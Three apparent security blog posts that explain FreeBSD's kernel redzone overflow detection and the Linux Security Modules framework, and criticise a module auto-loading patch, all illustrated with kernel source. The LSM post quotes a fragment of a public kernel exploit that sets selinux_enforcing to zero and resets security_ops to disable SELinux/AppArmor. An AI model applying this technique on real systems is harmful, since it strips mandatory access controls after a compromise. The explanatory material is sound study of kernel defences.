As you’ve probably read in the redzone(9) man page, this can be tuned through the ‘vm.redzone.panic’ and ‘vm.redzone.extra_mem’ SYSCTL variables. Inside vm/redzone.c we can find this:

SYSCTL_NODE(_vm, OID_AUTO, redzone, CTLFLAG_RW, NULL, "RedZone data");
static u_long redzone_extra_mem = 0;
SYSCTL_ULONG(_vm_redzone, OID_AUTO, extra_mem, CTLFLAG_RD, &redzone_extra_mem,
    0, "Extra memory allocated by redzone");     
static int redzone_panic = 0;
TUNABLE_INT("vm.redzone.panic", &redzone_panic);
SYSCTL_INT(_vm_redzone, OID_AUTO, panic, CTLFLAG_RW, &redzone_panic, 0,
    "Panic when buffer corruption is detected");     

Which shows which kernel variables those SYSCTL knobs map to. This isn’t really important but I decided to add it for completeness.

Setting Up a Red Zone
The code responsible for initializing a red-zone is inside redzone_setup() function which is shown below.

#define REDZONE_CHSIZE  (16)
#define REDZONE_CFSIZE  (16)
 ...
/*
 * Set redzones and remember allocation backtrace.
 */
void *
redzone_setup(caddr_t raddr, u_long nsize)
{
        struct stack st;
        caddr_t haddr, faddr;

        atomic_add_long(&redzone_extra_mem, redzone_size_ntor(nsize) - nsize);

        haddr = raddr + redzone_roundup(nsize) - REDZONE_HSIZE;
        faddr = haddr + REDZONE_HSIZE + nsize;

        /* Redzone header. */
        stack_save(&st);
        bcopy(&st, haddr, sizeof(st));
        haddr += sizeof(st);
        bcopy(&nsize, haddr, sizeof(nsize));
        haddr += sizeof(nsize);
        memset(haddr, 0x42, REDZONE_CHSIZE);
        haddr += REDZONE_CHSIZE;

        /* Redzone footer. */
        memset(faddr, 0x42, REDZONE_CFSIZE);
 
        return (haddr);
}

The algorithm here is fairly simple. After adding the red-zone overhead (redzone_size_ntor(nsize) - nsize) to ‘redzone_extra_mem’ using atomic_add_long(), it initializes ‘haddr’ (header address) and ‘faddr’ (footer address) to point to the beginning of the header and the end of the user buffer respectively. The current stack trace is placed at the header address, followed by the allocation size represented by the ‘nsize’ unsigned long integer.

#define STACK_MAX       18      /* Don't change, stack_ktr relies on this. */

struct stack {
        int             depth;
        vm_offset_t     pcs[STACK_MAX];
};

The rest of the header as well as the footer are filled with 0x42 (the hexadecimal value of the ASCII character ‘B’). So, with this knowledge we can now see that a red-zone in FreeBSD looks like this:

     +--------------------+ <--- Header
     |                    |
     |   Current stack    |
     |                    |
     +--------------------+ <--- Header + sizeof(struct stack)
     |  Allocation size   |
     +--------------------+ <--- Header + sizeof(struct stack) + sizeof(nsize)
     |     BBBBBBBBBB     |  REDZONE_CHSIZE bytes of 0x42
     +--------------------+ <--- Returned address
     |                    |
     |    User buffer     |  nsize bytes
     |                    |
     +--------------------+ <--- Footer
     |     BBBBBBBBBB     |  REDZONE_CFSIZE bytes of 0x42
     +--------------------+ <--- Footer + REDZONE_CFSIZE
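
To make the layout concrete, here is a simplified userspace analogue of the same technique. This is not FreeBSD code: the stack-trace header is replaced by just the allocation size, and corruption is only printed.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CANARY      0x42
#define CANARY_SIZE 16

/* Allocate nsize usable bytes surrounded by 0x42-filled guard areas. */
static void *
redzone_malloc(size_t nsize)
{
        unsigned char *raddr = malloc(sizeof(nsize) + 2 * CANARY_SIZE + nsize);

        if (raddr == NULL)
                return (NULL);
        memcpy(raddr, &nsize, sizeof(nsize));               /* allocation size */
        memset(raddr + sizeof(nsize), CANARY, CANARY_SIZE);         /* header */
        memset(raddr + sizeof(nsize) + CANARY_SIZE + nsize,
            CANARY, CANARY_SIZE);                                   /* footer */
        return (raddr + sizeof(nsize) + CANARY_SIZE);
}

/* Verify both guard areas on free, like redzone_check() does. */
static void
redzone_free(void *naddr)
{
        unsigned char *p = naddr;
        size_t nsize, i;

        memcpy(&nsize, p - CANARY_SIZE - sizeof(nsize), sizeof(nsize));
        for (i = 0; i < CANARY_SIZE; i++) {
                if (p[-CANARY_SIZE + i] != CANARY)
                        printf("underflow at byte %zu\n", i);
                if (p[nsize + i] != CANARY)
                        printf("overflow at byte %zu\n", i);
        }
        free(p - CANARY_SIZE - sizeof(nsize));
}

int
main(void)
{
        char *buf = redzone_malloc(8);

        buf[8] = 'X';           /* one-byte heap overflow */
        redzone_free(buf);      /* reports: overflow at byte 0 */
        return (0);
}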

Red-Zone Checks
To check whether a red-zone was corrupted, which almost certainly means that an overflow or underflow occurred in the buffer it protects, the redzone_check() function is used. Its argument is the address of the allocated space just after the red-zone header, which is why it initially subtracts the header size to read back its data into some local variables, as you can see in this code snippet:

/*
 * Verify redzones.
 * This function is called on free() and realloc().
 */
void
redzone_check(caddr_t naddr)
{
        struct stack ast, fst;
        caddr_t haddr, faddr;
        u_int ncorruptions;
        u_long nsize;
        int i;
 
        haddr = naddr - REDZONE_HSIZE;
        bcopy(haddr, &ast, sizeof(ast));
        haddr += sizeof(ast);
        bcopy(haddr, &nsize, sizeof(nsize));
        haddr += sizeof(nsize);
 
        atomic_subtract_long(&redzone_extra_mem,
            redzone_size_ntor(nsize) - nsize);

Then we find a simple ‘for’ loop that iterates over the header canary of the red-zone to ensure that no 0x42 bytes were altered.

        /* Look for buffer underflow. */
        ncorruptions = 0;
        for (i = 0; i < REDZONE_CHSIZE; i++, haddr++) {
                if (*(u_char *)haddr != 0x42)
                        ncorruptions++;
         }

However, if one or more altered/corrupted bytes were discovered, it will execute the next part.

        if (ncorruptions > 0) {
                printf("REDZONE: Buffer underflow detected. %u byte%s "
                    "corrupted before %p (%lu bytes allocated).\n",
                    ncorruptions, ncorruptions == 1 ? "" : "s", naddr, nsize);
                printf("Allocation backtrace:\n");
                stack_print_ddb(&ast);
                printf("Free backtrace:\n");
                stack_save(&fst);
                stack_print_ddb(&fst);
                if (redzone_panic)
                        panic("Stopping here.");
        }

This might panic the system (depending on the ‘redzone_panic’ variable, which is 0 by default but can be tuned through the SYSCTL interface), but before doing so it prints complete stack traces that can help in locating the bug. The next part of redzone_check() does the exact same task for the footer.

        faddr = naddr + nsize;
        /* Look for buffer overflow. */
         ncorruptions = 0;
        for (i = 0; i < REDZONE_CFSIZE; i++, faddr++) {
                if (*(u_char *)faddr != 0x42)
                        ncorruptions++;
        }

Once again, in case of one or more corrupted bytes the result will be a complete stack trace and, depending on the ‘redzone_panic’ value, a system panic.

        if (ncorruptions > 0) {
                printf("REDZONE: Buffer overflow detected. %u byte%s corrupted "
                    "after %p (%lu bytes allocated).\n", ncorruptions,
                    ncorruptions == 1 ? "" : "s", naddr + nsize, nsize);
                printf("Allocation backtrace:\n");
                stack_print_ddb(&ast);
                printf("Free backtrace:\n");
                stack_save(&fst);
                stack_print_ddb(&fst);
                if (redzone_panic)
                        panic("Stopping here.");
        }
}

Red-Zone in FreeBSD’s code
The last step is to see how those routines are utilized in the kernel memory allocation functions to provide the buffer corruption detection feature. All of the code snippets below are part of the kern/kern_malloc.c file, which implements FreeBSD’s kernel dynamic memory allocator. The setup of each red-zone is part of the kernel’s malloc() function.

void *
malloc(unsigned long size, struct malloc_type *mtp, int flags)
{
        int indx;
        struct malloc_type_internal *mtip;
        caddr_t va;
        uma_zone_t zone;
#if defined(DIAGNOSTIC) || defined(DEBUG_REDZONE)
        unsigned long osize = size;
#endif
  ...
#ifdef DEBUG_REDZONE
        size = redzone_size_ntor(size);
#endif

        if (size <= KMEM_ZMAX) {
  ...
#ifdef DEBUG_REDZONE
        if (va != NULL)
                va = redzone_setup(va, osize);
#endif
        return ((void *) va);
}

If the kernel is compiled with ‘DEBUG_REDZONE’ enabled, it will use the redzone_size_ntor() routine to calculate the real allocation size, and before returning the newly allocated VA space it will pass it to redzone_setup() in order to initialize a new red-zone for it.
The checks, as you might have guessed, are performed in free(); realloc() also ends up calling free(), as you can see here:

void *
realloc(void *addr, unsigned long size, struct malloc_type *mtp, int flags)
{
        uma_slab_t slab;
        unsigned long alloc;
        void *newaddr;
  ...
#ifdef DEBUG_REDZONE
        slab = NULL;
        alloc = redzone_get_size(addr);
#else
        slab = vtoslab((vm_offset_t)addr & ~(UMA_SLAB_MASK));
  ...
         /* Copy over original contents */
         bcopy(addr, newaddr, min(size, alloc));
         free(addr, mtp);
         return (newaddr);
}

Which, by the end of the function, frees the old memory space before returning the newly allocated one. The call to free() leads to the actual red-zone check.

void
free(void *addr, struct malloc_type *mtp)
{
        uma_slab_t slab;
        u_long size;
  ...
#ifdef DEBUG_REDZONE
        redzone_check(addr);
        addr = redzone_addr_ntor(addr);
#endif
  ...
        malloc_type_freed(mtp, size);
}

So, it will check that there was no corruption in the red-zone that protected the space to be freed.

Although bypassing this is quite straightforward, I won’t discuss it since there is no public resource demonstrating it and I only write about information that is already publicly available.

Written by xorl

December 21, 2010 at 19:12

Posted in freebsd, security

Introduction to Linux Security Modules (LSM)

with 2 comments

In this post I’ll give a brief explanation of how the “Linux Security Modules” feature is implemented in the kernel. First of all, this is a clever abstraction layer which allows different security modules to be safely loaded and unloaded without touching the kernel’s code directly.
The code snippets were taken from the 2.6.36 release of the Linux kernel. However, the original implementation was developed in 2001.

Hooking and Capabilities
A look in include/linux/security.h reveals a huge structure of function pointers. A snippet of that structure is shown below.

struct security_operations {
        char name[SECURITY_NAME_MAX + 1];

        int (*ptrace_access_check) (struct task_struct *child, unsigned int mode);
        int (*ptrace_traceme) (struct task_struct *parent);
        int (*capget) (struct task_struct *target,
                       kernel_cap_t *effective,
                       kernel_cap_t *inheritable, kernel_cap_t *permitted);
        int (*capset) (struct cred *new,
                       const struct cred *old,
                       const kernel_cap_t *effective,
                       const kernel_cap_t *inheritable,
                       const kernel_cap_t *permitted);
        int (*capable) (struct task_struct *tsk, const struct cred *cred,
                        int cap, int audit);
        int (*sysctl) (struct ctl_table *table, int op);
     ...
        int (*audit_rule_match) (u32 secid, u32 field, u32 op, void *lsmrule,
                                 struct audit_context *actx);
        void (*audit_rule_free) (void *lsmrule);
#endif /* CONFIG_AUDIT */
};

These are predefined and documented callback functions that a security module can implement to perform some security task at the specified hook point. The security header file then defines a series of security operation functions which by default either do nothing at all or fall back to plain capability checks. Here is an example snippet of these definitions.

/*
 * This is the default capabilities functionality.  Most of these functions
 * are just stubbed out, but a few must call the proper capable code.
 */

static inline int security_init(void)
{
        return 0;
}

static inline int security_ptrace_access_check(struct task_struct *child,
                                             unsigned int mode)
{
        return cap_ptrace_access_check(child, mode);
}

As you can see, some of the defined security operations fall back to POSIX capability checks, such as security_ptrace_access_check(), which is used in the kernel/ptrace.c code like this:

int __ptrace_may_access(struct task_struct *task, unsigned int mode)
{
        const struct cred *cred = current_cred(), *tcred;
     ...
        return security_ptrace_access_check(task, mode);
}

And the capability routine is placed in security/commoncap.c (which stands for “common capabilities”). It’s nothing more than a simple capability subset check under RCU locking.

/**
 * cap_ptrace_access_check - Determine whether the current process may access
 *                         another
 * @child: The process to be accessed
 * @mode: The mode of attachment.
 *
 * Determine whether a process may access another, returning 0 if permission
 * granted, -ve if denied.
 */
int cap_ptrace_access_check(struct task_struct *child, unsigned int mode)
{
        int ret = 0;

        rcu_read_lock();
        if (!cap_issubset(__task_cred(child)->cap_permitted,
                          current_cred()->cap_permitted) &&
            !capable(CAP_SYS_PTRACE))
                ret = -EPERM;
        rcu_read_unlock();
        return ret;
}

LSM Framework Initialization
Now that you have a basic understanding of how LSMs such as SELinux, AppArmor, Tomoyo etc. hook into Linux kernel routines, we can move to the next topic. This means jumping to the security/security.c file…
By default, the Linux kernel initializes the LSM framework like this:

/* Boot-time LSM user choice */
static __initdata char chosen_lsm[SECURITY_NAME_MAX + 1] =
        CONFIG_DEFAULT_SECURITY;

/* things that live in capability.c */
extern void __init security_fixup_ops(struct security_operations *ops);

static struct security_operations *security_ops;
static struct security_operations default_security_ops = {
        .name   = "default",
};

The default security operations include just the POSIX capability checks, as we saw in the previous section. In the include/linux/init.h header file we can find the initcall function pointer types along with the two linker symbols that mark the beginning and the end of the series of routines the LSM framework has to call to initialize itself.

/*
 * Used for initialization calls..
 */
typedef int (*initcall_t)(void);
typedef void (*exitcall_t)(void);
     ...
extern initcall_t __security_initcall_start[], __security_initcall_end[];

Back to security/security.c there’s the actual security module initialization function.

/**
 * security_init - initializes the security framework
 *
 * This should be called early in the kernel initialization sequence.
 */
int __init security_init(void)
{
        printk(KERN_INFO "Security Framework initialized\n");

        security_fixup_ops(&default_security_ops);
        security_ops = &default_security_ops;
        do_security_initcalls();

        return 0;
}

The first call leads to a security/capability.c function that fills any NULL member of the passed ‘security_ops’ structure with the default capability routine, as you can see in the snippet here:

#define set_to_cap_if_null(ops, function)                               \
        do {                                                            \
                if (!ops->function) {                                   \
                        ops->function = cap_##function;                 \
                        pr_debug("Had to override the " #function       \
                                 " security operation with the default.\n");\
                        }                                               \
        } while (0)

void __init security_fixup_ops(struct security_operations *ops)
{
        set_to_cap_if_null(ops, ptrace_access_check);
        set_to_cap_if_null(ops, ptrace_traceme);
        set_to_cap_if_null(ops, capget);
        set_to_cap_if_null(ops, capset);
     ...
}

Then security_init() will point the kernel’s ‘security_ops’ to the initialized structure and call do_security_initcalls(), which is basically nothing more than a loop that invokes every function registered between the previously mentioned __security_initcall_start and __security_initcall_end symbols.

static void __init do_security_initcalls(void)
{
        initcall_t *call;
        call = __security_initcall_start;
        while (call < __security_initcall_end) {
                (*call) ();
                call++;
        }
}

Also in security/security.c we can find the hook wrappers that the rest of the kernel calls; they simply dispatch through ‘security_ops’, so whichever module is registered (the default one or an LSM) handles them. Here is a sample of that.

int security_ptrace_access_check(struct task_struct *child, unsigned int mode)
{
        return security_ops->ptrace_access_check(child, mode);
}

int security_ptrace_traceme(struct task_struct *parent)
{
        return security_ops->ptrace_traceme(parent);
}

Registration of an LSM
Knowing how LSM hooking and initialization work in general, we can move to the next step, which is how a security framework is registered. The function for this is the following:

/**
 * register_security - registers a security framework with the kernel
 * @ops: a pointer to the struct security_options that is to be registered
 *
 * This function allows a security module to register itself with the
 * kernel security subsystem.  Some rudimentary checking is done on the @ops
 * value passed to this function. You'll need to check first if your LSM
 * is allowed to register its @ops by calling security_module_enable(@ops).
 *
 * If there is already a security module registered with the kernel,
 * an error will be returned.  Otherwise %0 is returned on success.
 */
int __init register_security(struct security_operations *ops)
{
        if (verify(ops)) {
                printk(KERN_DEBUG "%s could not verify "
                       "security_operations structure.\n", __func__);
                return -EINVAL;
        }

        if (security_ops != &default_security_ops)
                return -EAGAIN;

        security_ops = ops;

        return 0;
}

The code is very straightforward. It checks that the given structure isn’t NULL using verify(), shown below (which also fixes up any missing members). Then, before setting the kernel’s ‘security_ops’ to the LSM’s one, it makes sure that ‘security_ops’ still points to the default structure, i.e. that no other security module has already registered itself.

static inline int __init verify(struct security_operations *ops)
{
        /* verify the security_operations structure exists */
        if (!ops)
                return -EINVAL;
        security_fixup_ops(ops);
        return 0;
}

Load LSM on Boot
The LSM framework provides the ability to select which module is loaded at boot time. This is done through another function in security/security.c which decides whether the requesting LSM may become the active one instead of the default.

/**
 * security_module_enable - Load given security module on boot ?
 * @ops: a pointer to the struct security_operations that is to be checked.
 *
 * Each LSM must pass this method before registering its own operations
 * to avoid security registration races. This method may also be used
 * to check if your LSM is currently loaded during kernel initialization.
 *
 * Return true if:
 *      -The passed LSM is the one chosen by user at boot time,
 *      -or the passed LSM is configured as the default and the user did not
 *       choose an alternate LSM at boot time,
 *      -or there is no default LSM set and the user didn't specify a
 *       specific LSM and we're the first to ask for registration permission,
 *      -or the passed LSM is currently loaded.
 * Otherwise, return false.
 */
int __init security_module_enable(struct security_operations *ops)
{
        if (!*chosen_lsm)
                strncpy(chosen_lsm, ops->name, SECURITY_NAME_MAX);
        else if (strncmp(ops->name, chosen_lsm, SECURITY_NAME_MAX))
                return 0;

        return 1;
}

You can read the comment, which is very informative, and then see that this is nothing more than copying the module’s name into the kernel’s ‘chosen_lsm’ array shown earlier if no LSM was chosen at boot, or comparing the name against it otherwise.
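
Putting the pieces together, here is a rough sketch of how a minimal built-in LSM would register itself on a 2.6.36-era kernel. The module name and its single hook are made up for illustration; everything left unset in ‘nolsm_ops’ gets filled in by security_fixup_ops() through verify().

/* hypothetical file: security/nolsm/nolsm.c */
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/security.h>

/* Example hook: refuse every ptrace attachment. */
static int nolsm_ptrace_access_check(struct task_struct *child,
                                     unsigned int mode)
{
        return -EPERM;
}

static struct security_operations nolsm_ops = {
        .name                = "nolsm",
        .ptrace_access_check = nolsm_ptrace_access_check,
};

static int __init nolsm_init(void)
{
        /* Bail out if another LSM was chosen with security= at boot. */
        if (!security_module_enable(&nolsm_ops))
                return 0;
        if (register_security(&nolsm_ops))
                panic("nolsm: failed to register with the kernel\n");
        printk(KERN_INFO "nolsm: initialized\n");
        return 0;
}

/* Places nolsm_init between __security_initcall_start and _end. */
security_initcall(nolsm_init);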

Resetting LSM to default
Finally, we have probably the most useful task from an exploit developer’s point of view. This is resetting the LSM framework back to its default. Inside security/security.c the routine that does exactly this, is very simple…

void reset_security_ops(void)
{
        security_ops = &default_security_ops;
}

Since there is already public exploit code that does exactly this, I’ll write about it too.

What spender does in own_the_kernel() to disable AppArmor and/or SELinux is just what the above reset_security_ops() function does.

        security_ops = (unsigned long *)get_kernel_sym("security_ops");
        default_security_ops = get_kernel_sym("default_security_ops");
        sel_read_enforce = get_kernel_sym("sel_read_enforce");
   ...
        // disable SELinux
        if (selinux_enforcing && *selinux_enforcing) {
                what_we_do = 2;
                *selinux_enforcing = 0;
        }

        if (!selinux_enabled || (selinux_enabled && *selinux_enabled == 0)) {
                // trash LSM
                if (default_security_ops && security_ops) {
                        if (*security_ops != default_security_ops)
                                what_we_do = 3;
                        *security_ops = default_security_ops;
                }
        }

He obtains the kernel symbols through either ‘/proc/kallsyms’ or ‘/proc/ksyms’ and then just resets them to the default ones. His exploit includes a feature to make the system look like SELinux is still in enforcing mode, but this is out of the scope of this post since it is SELinux specific.

I intentionally omitted some details such as the security_initcall() macro, but I’ll discuss them in more detail in future posts dealing with some popular LSMs, including SELinux, Tomoyo, SMACK and AppArmor. After all, this was just an introduction.

Written by xorl

December 20, 2010 at 16:38

Posted in linux, security

Linux kernel Disable Auto-Loading of Kernel Modules

with 2 comments

Yesterday, I saw this email and I was like WTF?!
The patch simply comments out the MODULE_ALIAS_NETPROTO() macros of the RDS and ECONET protocols but seriously… Is this a security patch?
What? Linux developers are too cool for a simple patch such as grsecurity’s MODHARDEN?
If someone was about to own a system using a local root exploit in some exotic protocol family, he has probably already done so before the bug was killed. So, the aim of this patch is to keep future vulnerabilities in those two modules out of reach by disabling their auto-loading, as sketched below. Then what’s the purpose of compiling them and keeping them in the Linux kernel at all?
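
For context, the mechanism looks roughly like this (sketched from the 2.6.36-era include/linux/net.h and net/socket.c, so take the exact code with a grain of salt): the macro only emits a module alias that the socket(2) path resolves through modprobe, so commenting it out breaks auto-loading while the module itself remains buildable and loadable by hand.

/* include/linux/net.h */
#define MODULE_ALIAS_NETPROTO(proto) \
        MODULE_ALIAS("net-pf-" __stringify(proto))

/* net/socket.c, __sock_create(): when no handler is registered for the
 * requested family, the kernel asks modprobe for "net-pf-<N>" --
 * without the alias, modprobe no longer finds the module. */
#ifdef CONFIG_MODULES
        if (net_families[family] == NULL)
                request_module("net-pf-%d", family);
#endif
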
I don’t like spender (and he doesn’t like me either) but that has nothing to do with his MODHARDEN patch, which is a very sane mitigation strategy against such vulnerabilities.

Written by xorl

December 1, 2010 at 07:59

Posted in linux, security